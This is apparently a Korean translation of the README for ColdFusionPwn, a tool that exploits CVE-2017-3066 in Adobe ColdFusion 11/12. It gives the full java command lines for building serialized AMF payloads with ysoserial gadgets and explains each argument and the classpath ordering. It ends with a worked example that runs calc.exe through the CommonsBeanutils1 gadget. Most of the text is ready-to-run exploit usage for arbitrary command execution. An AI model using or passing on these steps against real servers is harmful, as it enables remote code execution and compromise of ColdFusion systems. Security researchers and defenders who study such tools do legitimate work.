
Adobe Coldfusion 11/12를 대상으로 하는 CVE-2017-3066 악용 도구
Adobe Coldfusion 11/12를 대상으로 하는 CVE-2017-3066 공격 도구입니다.
이 도구를 사용하면 허용된 클래스에 대한 입력 검증 누락을 악용하기 위한 직렬화된 AMF 페이로드를 생성할 수 있습니다. 자세한 내용은 블로그 게시물을 참조하세요.
최신 버전의 ysoserial을 받으세요. 릴리스에서 ColdFusionPwn을 받으세요.
java -cp ColdFusionPwn-0.0.1-SNAPSHOT-all.jar:ysoserial-master-SNAPSHOT.jar com.codewhitesec.coldfusionpwn.ColdFusionPwner [-s|-e] [payload type] '[command]' [outfile]
- [-s|-e] Setter(CF11) 또는 Externalizable 익스플로잇(CF11/12) 기법
- [payload type] ysoserial gadget 페이로드
- [command] 실행할 명령
- [outfile] 생성된 페이로드의 출력 파일
ysoserial에 포함된 ApacheCommons BeanUtils 라이브러리가 더 새롭기 때문에(그리고 다른 serialversion uid를 가지기 때문에) ColdFusionPwn-0.0.1-SNAPSHOT-all.jar를 클래스패스의 첫 번째 항목으로 지정해야 합니다.
java -cp ColdFusionPwn-0.0.1-SNAPSHOT-all.jar:ysoserial-master-SNAPSHOT.jar com.codewhitesec.coldfusionpwn.ColdFusionPwner -e CommonsBeanutils1 calc.exe /tmp/out.amf